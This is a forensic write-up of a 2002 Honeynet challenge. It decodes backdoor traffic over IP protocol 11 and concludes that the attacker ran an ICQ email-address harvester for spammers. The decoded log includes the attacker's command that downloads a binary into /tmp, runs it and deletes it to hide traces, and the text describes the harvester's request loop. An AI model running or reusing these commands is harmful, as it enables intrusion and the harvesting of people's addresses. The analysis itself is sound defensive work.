HoneyNet Challenge Analysis

Scan 22 – August 2002

Analysis by Kevin Peuhkurinen
August 12, 2002

The Challenge

After penetrating the Linux system using the WU-FTPD vulnerability, the attacker deployed a backdoor binary and then proceeded to use the system for certain nefarious activity. Your mission, should you choose to accept it, is to determine what the activity was and how it was accomplished. All the necessary evidence is contained in the snort binary capture file. The IP address of the honeypot is

Preliminary Steps

As the basis of this attack was the backdoor binary that was the subject of the Reverse Challenge from May 2002, the first step was to read some of the analyses from that Challenge. Of particular value to me was the advisory written by (CoPS) Lab at the University of North Texas, and located here:

To summarize, the backdoor binary listens for IP packets which have the protocol number set to 11. As these packets arrive statelessly, the source IP address can be spoofed. Each packet carries a type number, which is either 2 for a command or 3 for a reply. The rest of each packet is trivially encoded to hide its contents. Having loaded the Snort log in Ethereal, I could see these packets, beginning at #7.
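As a rough illustration of how such packets can be picked out of a capture, the sketch below reads the protocol field of a raw IPv4 header (byte 9) and compares it with 11. The function names and the `build_header` helper are hypothetical and exist only for this example; the sketch does not attempt to decode the backdoor's payload.

```python
import struct

NVP_PROTOCOL = 11  # IP protocol number the backdoor listens for (from the text)


def ip_protocol(packet: bytes) -> int:
    """Return the protocol field of a raw IPv4 packet (header byte 9)."""
    if len(packet) < 20:
        raise ValueError("too short for an IPv4 header")
    if packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    return packet[9]


def is_backdoor_candidate(packet: bytes) -> bool:
    """True when the packet uses the protocol number the backdoor expects."""
    return ip_protocol(packet) == NVP_PROTOCOL


def build_header(protocol: int) -> bytes:
    """Hypothetical helper: a minimal 20-byte IPv4 header with made-up addresses.

    The checksum is left at zero because only the protocol field matters here.
    """
    return struct.pack(
        "!BBHHHBBH4s4s",
        0x45,        # version 4, header length 5 words
        0,           # type of service
        20,          # total length
        0,           # identification
        0,           # flags and fragment offset
        64,          # time to live
        protocol,    # protocol number
        0,           # header checksum (not computed)
        bytes([10, 0, 0, 1]),
        bytes([10, 0, 0, 2]),
    )


print(is_backdoor_candidate(build_header(11)))
print(is_backdoor_candidate(build_header(6)))
```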

In order to read the packets easily, I downloaded and used Dion Mendel's Perl script from the Reverse Challenge. It is located here:

I quickly (okay, it took a few minutes of head scratching) found a small typo in the script: on lines 59 and 87, the second $data[4] should read $data[5]. After making the necessary change, I re-ran the script on the Snort log and studied the output:

-> (handler -> agent)
Initialise agent.
All replies are sent to handler at
(plus 9 other randomly generated hosts)
----------------------------------------------------------------
-> (handler -> agent)
Execute the given command and send output to handler:
grep -i "zone" /etc/named.conf
----------------------------------------------------------------
-> (agent -> handler)
output of command executed by agent:
zone "." {
zone "0.0.127.in-addr.arpa" {

(Snipped out the redundant packets going to bogus IP addresses)

-> (agent -> handler)
end of output of command executed by agent
----------------------------------------------------------------
-> (handler -> agent)
Execute the given command, do not send output to handler:
killall -9 ttserve
----------------------------------------------------------------
-> (handler -> agent)
Execute the given command, do not send output to handler:
killall -9 ttserve
----------------------------------------------------------------
-> (handler -> agent)
Execute the given command, do not send output to handler:
killall -9 ttserve ; lynx -source > /tmp/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ;
----------------------------------------------------------------
-> (handler -> agent)
Execute the given command, do not send output to handler:
killall -9 lynx ; rm -rf /tmp/ttserve;
----------------------------------------------------------------
-> (handler -> agent)
Execute the given command, do not send output to handler:
killall -9 lynx ; rm -rf /tmp/ttserve;
----------------------------------------------------------------
-> (handler -> agent)
Execute the given command, do not send output to handler:
killall -9 lynx ; rm -rf /tmp/ttserve;

I must admit that following this, I spent about six hours becoming more and more baffled. I was working under the assumption that 'foo' was an IRC bot. This assumption was given to me first by The Honeynet Project itself, here.

The assumption was backed up when I started doing Google searches for some of the text that I found in 'foo' and the searches kept coming back with links to an IRC bot named “Puaj”.

Part of the problem I had with this is that I never use IRC. I briefly played around with multi-user BBSs back in the 1980s and since then have always felt that, in terms of useful or even entertaining ways of spending time, electronic chat ranks well below scrubbing mildew from the cracks between my bathroom tiles. Hence I did not even really know what an IRC bot was.

So, after spending some time reading about the many varied uses of IRC bots, I was unable to reconcile what I had learned with the behaviour of 'foo', which simply appeared to be requesting the home pages of IRC users. Also, I was still wondering why an IRC hacker would care about the DNS zones hosted by the system (the first command our hacker sent to the NVP Trojan). It was only then, when I was beginning to seriously doubt my original assumption, that I noticed something odd about the behaviour of 'foo' that gave me a new idea about what the attacker's purpose might be.

I will elaborate on this in the answers section, but I have finally come to the conclusion that this attacker is a spammer or is working for spammers.


1. What is the attacker's IP Address?

This one is simple: It was sent to the NVP Trojan in the first packet. According to WHOIS, the attacking machine is located in New Zealand.

2. What is the attacker doing first? What do you think is his/her motivation for doing this?

The first thing the attacker does after initializing the trojan is to tell it to run the command:
grep -i "zone" /etc/named.conf
and send the output back to the attacker. If this system were operating as a DNS server, this command would list all of the zone names it served. Spammers are interested in enumerating domain names in order to find new places to send their unsolicited emails.
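To show what the attacker would have learned from a machine that really was serving DNS, here is a small sketch that mimics the case-insensitive grep on a made-up named.conf. The sample configuration, including the "example.com" zone and the file names, is entirely hypothetical; the honeypot itself only returned the two default zones shown earlier.

```python
import re
from typing import List


def grep_i(pattern: str, text: str) -> List[str]:
    """Return the lines of text that match pattern, ignoring case (like grep -i)."""
    rx = re.compile(pattern, re.IGNORECASE)
    return [line for line in text.splitlines() if rx.search(line)]


# Hypothetical configuration for illustration only.
SAMPLE_NAMED_CONF = """\
options {
    directory "/var/named";
};
zone "." {
    type hint;
    file "named.ca";
};
zone "0.0.127.in-addr.arpa" {
    type master;
    file "named.local";
};
zone "example.com" {
    type master;
    file "db.example.com";
};
"""

matches = grep_i("zone", SAMPLE_NAMED_CONF)
for line in matches:
    print(line)
```

On this sample, the third matching line is the one that would give away a hosted domain name.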

3. Why there is some readable text in packets #17-#25 (and some others), but not in packets #15-#16 (and several others)? What differentiates these groups of packets from each other?

Actually, all of the response packets from the victim have some readable text in them: part of the command executed by the trojan and part of the response. This is due to sloppy coding on the part of the programmer who created the NVP Trojan. To understand why this is happening, I looked at Dion Mendel's source code for the reverse engineered binary.

If you are unfamiliar with C, this section may be confusing to you. If so, I apologize. I considered putting in a paragraph trying to describe how string buffer pointers work but figured that I would probably just end up making it more confusing.

At line 2,211 the code constructs a command string and stores it at a memory location pointed to by 'buffer' (using the dangerous sprintf() function which means that, ironically, the trojan may be vulnerable to buffer overflow attacks!). So, in our attack, we now have a string in memory that reads:
/bin/csh -f -c "grep -i "zone" /etc/named.conf" 1> /tmp/.hj237349 2>&1

This command is then sent to the system to be executed. Then, at line 2,219, the trojan reads up to the first 398 bytes of the command's output into the same memory location, overwriting the start of the command string. The memory that 'buffer' points to now looks like this:
zone "." { zone "0.0.127.in-addr.arpa" { .conf" 1> /tmp/.hj237349 2>&1
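The overwrite can be reproduced with a few lines of Python. This is only a model of the behaviour described above, not the trojan's actual code: `overwrite_prefix` is a hypothetical name, and the command output is assumed to be the two lines seen in the capture, each ending in a newline.

```python
def overwrite_prefix(buffer: bytes, data: bytes, max_read: int = 398) -> bytes:
    """Copy at most max_read bytes of data over the start of buffer.

    Anything in buffer beyond the copied bytes is left untouched, which is
    what happens when a C program reuses a buffer without clearing it.
    """
    chunk = data[:max_read]
    reused = bytearray(buffer)
    reused[:len(chunk)] = chunk
    return bytes(reused)


command = b'/bin/csh -f -c "grep -i "zone" /etc/named.conf" 1> /tmp/.hj237349 2>&1'
output = b'zone "." {\nzone "0.0.127.in-addr.arpa" {\n'  # assumed command output

result = overwrite_prefix(command, output)
print(result.decode())
```

The 41 bytes of output replace the first 41 bytes of the command, so the leftover tail starts exactly at the ".conf" of "/etc/named.conf".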

Two lines later, the trojan copies the output part of this and sends it to the encode function with the result being placed in a new string at 'output_buffer'.

So far so good, but the programmer decided that she wanted each response packet to be a random size. She tells the transmit function to start sending the contents of memory at the 'output_buffer' pointer and to send 400 bytes plus a random number of extra bytes between one and two hundred. The programmer no doubt assumed that those extra bytes would look like garbage. Well, as I pointed out in my Preliminary Steps section, assumptions can be dangerous. In this case, when the program was allocating memory for the strings, it must have given 'buffer' the memory that directly followed that given to 'output_buffer'. You can literally see the results:

In the first response packet (which is sent out 10 times – once to the handler and again to nine random IP addresses), the data section is 512 bytes which means 400 bytes of encoded (and also padded) data plus 112 bytes from the 'buffer' memory. This includes all of the text shown above plus some garbage.

In the second response packet, the data section is 463 bytes: 400 of encoded and padded data and 63 bytes of the text above. Counting it now, I see that I am off by a bit (okay, a bunch of bits), which means that there are probably a few bytes allocated to an integer between the two strings, but the theory still works.
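The arithmetic behind those two packets can be sketched as follows. The layout is an assumption made for illustration: 'buffer' is placed immediately after a 400-byte 'output_buffer', with no variable in between (so the small discrepancy noted above is ignored), and the rest of memory is modelled as zero bytes.

```python
ENCODED_LEN = 400  # size of the encoded, padded payload (from the text)


def leaked_tail(memory: bytes, packet_len: int) -> bytes:
    """Return the bytes sent beyond the encoded payload for a given packet size."""
    return memory[ENCODED_LEN:packet_len]


# Stand-in for the encoded data; its real contents do not matter here.
output_buffer = bytes(ENCODED_LEN)
# Contents of 'buffer' after the command output overwrote the command string.
buffer = b'zone "." {\nzone "0.0.127.in-addr.arpa" {\n.conf" 1> /tmp/.hj237349 2>&1'
# Assumed contiguous layout, followed by whatever else happens to be in memory.
memory = output_buffer + buffer + bytes(200)

for size in (512, 463):
    tail = leaked_tail(memory, size)
    readable = tail[:len(buffer)]
    print(size, len(tail), len(readable))
```

Under these assumptions the 512-byte packet carries the whole 70-byte string plus 42 further bytes, while the 463-byte packet carries only its first 63 bytes.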

Hence, the programmer has managed to do exactly what they meant to avoid: transmitting suspicious-looking traffic.

4. What is the purpose of 'foo'? Can you provide more insights about the internal workings of 'foo'? Do you think that 'foo' was coded by a good programmer or by an amateur?

The observed behaviour of foo is thus:

  1. Look up the IP address of web.icq.com
  2. Open an HTTP connection to the IP address using a source port starting at 1026 and incrementing by one each loop.
  3. Send GET /wwp?Uin=xxxxxxxx HTTP/1.0 Host:web.icq.com where xxxxxxxx is a number starting at 9207102 and incrementing by one each loop.
  4. Accept a number of packets in response, usually about 10-14.
  5. Send the GET request again. I think this is a bug.
  6. Close the TCP connection.
  7. Start over at step 1.
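Because both counters advance in lockstep, the source port seen in the capture tells you which UIN was being requested. The sketch below models only that bookkeeping and opens no connections. The function names are hypothetical, the CRLF line endings in the request are an assumption, and the mapping holds only if the ports really do increase by one per loop with no gaps.

```python
from typing import Tuple

FIRST_PORT = 1026     # source port of the first connection (from the text)
FIRST_UIN = 9207102   # first ICQ number requested (from the text)


def request_for_iteration(i: int) -> Tuple[int, int, str]:
    """Return (source port, UIN, request text) for loop iteration i, counted from 0."""
    port = FIRST_PORT + i
    uin = FIRST_UIN + i
    # Line endings are assumed; the header spelling follows the capture.
    request = f"GET /wwp?Uin={uin} HTTP/1.0\r\nHost:web.icq.com\r\n\r\n"
    return port, uin, request


def uin_for_source_port(port: int) -> int:
    """Map a source port seen in the capture back to the UIN requested."""
    if port < FIRST_PORT:
        raise ValueError("port precedes the first observed connection")
    return FIRST_UIN + (port - FIRST_PORT)


for i in range(3):
    port, uin, _ = request_for_iteration(i)
    print(port, uin)
```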

What finally clued me in to the idea that the attacker is a spammer is step 4 above. Why, I wondered, didn't 'foo' wait for the full response from the icq.com server? Why was it closing the connection half-way through the web page download? It took me a while but I finally realized that the last packet that 'foo' accepted was the packet that contained the ICQ user's email address. It could be coincidence but I can think of no other explanation for this behaviour: 'foo' is a tool of evil -- a real-life email address harvester.

With the exception of the HTTP GET command, the only readable text in 'foo' is from various pre-existing code such as gethostbyname and yplibc. This leads me to believe that the actual code was obfuscated either as source or during compiling to object code. Still, I can make a few observations about 'foo'. The first is that it contains its own DNS resolver, although it uses the locally configured DNS server name. Probably this is to ensure that it can use DNS even if the local system is not set up to do so, and it likely has a DNS server address to fall back on if it cannot find one in resolv.conf.

More interesting is the inclusion of the Network Information Service (formerly YP) library 'yplibc'. Obviously an email harvester is useless if you cannot retrieve the email addresses it has found. My guess here is that 'foo' is opening an RPC listener process bound to a TCP or UDP port via which the attacker can request the list of email addresses found. This would eliminate the need for the original exploit and would ensure that no suspicious log files are left behind – which is something that the attacker seems concerned about (more on that later).

Finally, on the question of the skill of the programmer, I have very little information on which to base an opinion, but I would have to say that he or she is closer to amateur than to expert. My reasons for saying so are:

  1. 'foo' does a DNS lookup for web.icq.com every loop. This just seems lazy, as though the programmer couldn't be bothered to put in the code to check every 100 loops which would have sped the program up.
  2. The program sends the HTTP GET command a second time just before closing the TCP connection. This must be a bug.
  3. A good programmer would have created a multi-threaded application to request several pages at once.
  4. A capable programmer who was concerned about fully hiding their purpose would not have linked in code that contained human readable text.

5. What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done by the attacker?

The full command line sent by the attacker is:

killall -9 ttserve ; lynx -source > /tmp/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ;

What the attacker is doing here is:

  1. Killing any process that might be running as 'ttserve'
  2. Downloading 'foo' to /tmp as 'ttserve'
  3. Making 'ttserve' executable
  4. Changing the current working directory to /tmp
  5. Launching 'ttserve'
  6. Deleting 'ttserve' from the disk

So the purpose of this part of the command is to execute the program then delete it from the disk so that it leaves no easily discernible traces. The attacker is obviously very concerned about this as he or she repeats the rm command three more times.
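The reason deleting a file does not stop anything that already has it open can be demonstrated on a POSIX system with an ordinary temporary file. This is an analogy rather than a reproduction of the attack: the sketch uses an open file handle, whereas in the attack it is the running program whose file is removed, and `unlink_while_open` is a hypothetical name. It assumes Unix-like semantics and would fail on Windows.

```python
import os
import tempfile
from typing import Tuple


def unlink_while_open() -> Tuple[bool, bytes]:
    """Delete a file that is still open, then read it back through the handle.

    Returns (path_is_gone, data_read). On POSIX systems the directory entry
    disappears immediately, but the contents stay reachable until the last
    open handle is closed.
    """
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "w+b") as handle:
        handle.write(b"still here")
        handle.flush()
        os.unlink(path)                      # remove the name from the disk
        path_is_gone = not os.path.exists(path)
        handle.seek(0)
        data = handle.read()                 # contents remain readable
    return path_is_gone, data


print(unlink_while_open())
```

An investigator listing /tmp afterwards would find nothing by name, which is consistent with the attacker's apparent goal.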

6. How do you think the attacker will use the results of his activity involving 'foo'?

If my belief is correct and 'foo' is an email address harvester, the attacker will use the results of 'foo' to send unsolicited commercial email to the poor ICQ users whose email addresses are on display on their generated web pages. The other possibility is that the attacker is not a spammer himself or herself but is in the business of selling email addresses to spammers.

Either way, the hapless ICQ users can look forward to seeing their in-boxes fill up with mail inviting them to hot teen sex sites, offering cheap Viagra alternatives, and pleading for help on behalf of the daughters of former Nigerian dictators.

7. If you administer a network, would you have caught such NVP backdoor communication? If yes, how? If you do not administer a network, what do you think is the best way to prevent such communication from happening and/or detect it?

As a network administrator, I would never have a firewall so badly misconfigured that it allowed packets in or out with the IP protocol field set to 11. Additionally, I would have been alerted to the attempt by my Snort IDS which would have logged the packets as “Bad Traffic: Non-Standard IP Protocol”, which I would certainly have investigated further.